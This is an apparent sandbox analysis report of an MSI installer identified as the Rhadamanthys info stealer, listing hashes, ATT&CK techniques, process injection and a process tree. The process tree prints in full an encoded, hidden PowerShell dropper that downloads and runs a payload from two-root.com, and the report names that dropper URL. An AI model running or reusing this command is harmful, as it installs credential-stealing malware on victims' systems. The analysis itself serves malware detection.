rhadamanthys | f4f4dd8a1fca44d6d7c78da7dc5741b91250eabf8faae79604c786672ea2efb8

Resubmissions

29-06-2024 14:38

240629-rzv2qasepl 10

29-06-2024 14:34

240629-rxnvmazblg 10

Analysis

max time kernel
142s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2024 14:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

__x64___setup___x32__/setup.msi
Size

34.8MB
MD5

1086315ee22b1c20eb4aa7a57cbb8b6b
SHA1

1c734fc3f48e355a438cfed270f927b3922ef0ac
SHA256

d9324c156a90b828e3f110a871b6eca08bb6251fc34dcb8b570c05f48a6b642d
SHA512

f6fdfd4751e9b717b7acef31973e34219d2c1e49869b956c27f2a675461ad70b4d727fefb8dba5910954ef8012232913e79549acaa75558015e4de24ee804c05
SSDEEP

786432:wqqRkI57hVSZmlNdonqUuhGMCiEIS/vTis1Mscz:wq+T57jSZmGnqUezSTtqz

Score

10^/10

rhadamanthys execution persistence privilege_escalation stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://two-root.com/2506s.bs64

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

explorer.exe

description pid process target process

PID 4996 created 2644 4996 explorer.exe sihost.exe
Blocklisted process makes network request 3 IoCs

Processes:

MsiExec.exepowershell.exe

flow pid process

15 2960 MsiExec.exe
17 2960 MsiExec.exe
35 4820 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4820 powershell.exe

description	pid	process	target process
PID 4996 created 2644	4996	explorer.exe	sihost.exe

flow	pid	process
15	2960	MsiExec.exe
17	2960	MsiExec.exe
35	4820	powershell.exe

pid	process
4820	powershell.exe

Enumerates connected drives 3 TTPs 50 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exemsedge.exemsedge.exe

description	ioc	process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\F:	msedge.exe
File opened (read-only)	\??\F:	msedge.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\D:	msedge.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\D:	msedge.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

rnpkeys.exe

description pid process target process

PID 2472 set thread context of 4996 2472 rnpkeys.exe explorer.exe

description	pid	process	target process
PID 2472 set thread context of 4996	2472	rnpkeys.exe	explorer.exe

Drops file in Windows directory 16 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSIF61F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDC08.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDDA1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDDF0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5D0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57db4c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDD42.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB6F.tmp	msiexec.exe
File created	C:\Windows\Installer\e57db4c.msi	msiexec.exe
File created	C:\Windows\Installer\e57db50.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDCC4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDE01.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{FB5D18FF-C36F-4168-82BF-355300A3DFA6}	msiexec.exe

Executes dropped EXE 2 IoCs

Processes:

UnRAR.exernpkeys.exe

pid process

4412 UnRAR.exe
2472 rnpkeys.exe
Loads dropped DLL 9 IoCs

Processes:

MsiExec.exernpkeys.exe

pid process

2960 MsiExec.exe
2960 MsiExec.exe
2960 MsiExec.exe
2960 MsiExec.exe
2960 MsiExec.exe
2960 MsiExec.exe
2960 MsiExec.exe
2960 MsiExec.exe
2472 rnpkeys.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
persistence privilege_escalation

Installer Packages
T1546.016

Processes:

msiexec.exe

pid process

3468 msiexec.exe
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4412 4996 WerFault.exe explorer.exe
924 4996 WerFault.exe explorer.exe
4576 4996 WerFault.exe explorer.exe

pid	process
4412	UnRAR.exe
2472	rnpkeys.exe

pid	process
2960	MsiExec.exe
2960	MsiExec.exe
2960	MsiExec.exe
2960	MsiExec.exe
2960	MsiExec.exe
2960	MsiExec.exe
2960	MsiExec.exe
2960	MsiExec.exe
2472	rnpkeys.exe

pid	pid_target	process	target process
4412	4996	WerFault.exe	explorer.exe
924	4996	WerFault.exe	explorer.exe
4576	4996	WerFault.exe	explorer.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133641453450079357"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{16047531-05F9-43E7-B382-49914202A19B}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{AEE173FB-61CB-4D27-A3C4-CE82BB09A76B}	msedge.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

msiexec.exepowershell.exeexplorer.exeopenwith.exemsedge.exe

pid	process
1268	msiexec.exe
1268	msiexec.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4996	explorer.exe
4996	explorer.exe
440	openwith.exe
440	openwith.exe
440	openwith.exe
440	openwith.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
880	msedge.exe
880	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exemsedge.exe

pid process

1592 msedge.exe
1592 msedge.exe
1592 msedge.exe
1592 msedge.exe
1592 msedge.exe
880 msedge.exe
880 msedge.exe
880 msedge.exe
880 msedge.exe
880 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	3468	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3468	msiexec.exe
Token: SeSecurityPrivilege	1268	msiexec.exe
Token: SeCreateTokenPrivilege	3468	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3468	msiexec.exe
Token: SeLockMemoryPrivilege	3468	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3468	msiexec.exe
Token: SeMachineAccountPrivilege	3468	msiexec.exe
Token: SeTcbPrivilege	3468	msiexec.exe
Token: SeSecurityPrivilege	3468	msiexec.exe
Token: SeTakeOwnershipPrivilege	3468	msiexec.exe
Token: SeLoadDriverPrivilege	3468	msiexec.exe
Token: SeSystemProfilePrivilege	3468	msiexec.exe
Token: SeSystemtimePrivilege	3468	msiexec.exe
Token: SeProfSingleProcessPrivilege	3468	msiexec.exe
Token: SeIncBasePriorityPrivilege	3468	msiexec.exe
Token: SeCreatePagefilePrivilege	3468	msiexec.exe
Token: SeCreatePermanentPrivilege	3468	msiexec.exe
Token: SeBackupPrivilege	3468	msiexec.exe
Token: SeRestorePrivilege	3468	msiexec.exe
Token: SeShutdownPrivilege	3468	msiexec.exe
Token: SeDebugPrivilege	3468	msiexec.exe
Token: SeAuditPrivilege	3468	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3468	msiexec.exe
Token: SeChangeNotifyPrivilege	3468	msiexec.exe
Token: SeRemoteShutdownPrivilege	3468	msiexec.exe
Token: SeUndockPrivilege	3468	msiexec.exe
Token: SeSyncAgentPrivilege	3468	msiexec.exe
Token: SeEnableDelegationPrivilege	3468	msiexec.exe
Token: SeManageVolumePrivilege	3468	msiexec.exe
Token: SeImpersonatePrivilege	3468	msiexec.exe
Token: SeCreateGlobalPrivilege	3468	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe
Token: SeRestorePrivilege	1268	msiexec.exe
Token: SeTakeOwnershipPrivilege	1268	msiexec.exe

Suspicious use of FindShellTrayWindow 28 IoCs

Processes:

msiexec.exemsedge.exe

pid	process
3468	msiexec.exe
3468	msiexec.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exernpkeys.exeexplorer.exepowershell.exemsedge.exe

description	pid	process	target process
PID 1268 wrote to memory of 2960	1268	msiexec.exe	MsiExec.exe
PID 1268 wrote to memory of 2960	1268	msiexec.exe	MsiExec.exe
PID 1268 wrote to memory of 2960	1268	msiexec.exe	MsiExec.exe
PID 1268 wrote to memory of 4412	1268	msiexec.exe	UnRAR.exe
PID 1268 wrote to memory of 4412	1268	msiexec.exe	UnRAR.exe
PID 1268 wrote to memory of 2472	1268	msiexec.exe	rnpkeys.exe
PID 1268 wrote to memory of 2472	1268	msiexec.exe	rnpkeys.exe
PID 2472 wrote to memory of 4996	2472	rnpkeys.exe	explorer.exe
PID 2472 wrote to memory of 4996	2472	rnpkeys.exe	explorer.exe
PID 2472 wrote to memory of 4996	2472	rnpkeys.exe	explorer.exe
PID 2472 wrote to memory of 4996	2472	rnpkeys.exe	explorer.exe
PID 4996 wrote to memory of 4820	4996	explorer.exe	powershell.exe
PID 4996 wrote to memory of 4820	4996	explorer.exe	powershell.exe
PID 4996 wrote to memory of 440	4996	explorer.exe	openwith.exe
PID 4996 wrote to memory of 440	4996	explorer.exe	openwith.exe
PID 4996 wrote to memory of 440	4996	explorer.exe	openwith.exe
PID 4996 wrote to memory of 440	4996	explorer.exe	openwith.exe
PID 4996 wrote to memory of 440	4996	explorer.exe	openwith.exe
PID 4820 wrote to memory of 1592	4820	powershell.exe	msedge.exe
PID 4820 wrote to memory of 1592	4820	powershell.exe	msedge.exe
PID 1592 wrote to memory of 4916	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 4916	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe
PID 1592 wrote to memory of 348	1592	msedge.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2644

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:440

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3468

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9AA94E0783D98A9DEC8766721F0E2A05
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:2960

C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe
"C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\"
2⤵
- Executes dropped EXE
PID:4412

C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe
"C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe"
2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe explorer.exe
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAyADUAMAA2AHMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
5⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x35c,0x7ffef875ceb8,0x7ffef875cec4,0x7ffef875ced0
6⤵
PID:4916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2284,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:2
6⤵
PID:348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:3
6⤵
PID:4000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2432,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=3096 /prefetch:8
6⤵
PID:2244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3424,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:1
6⤵
PID:2260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3432,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:1
6⤵
PID:1256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4964,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:2
6⤵
PID:3376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=4880 /prefetch:8
6⤵
PID:2472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5472,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=3428 /prefetch:1
6⤵
PID:1936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4852,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:1
6⤵
PID:1420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
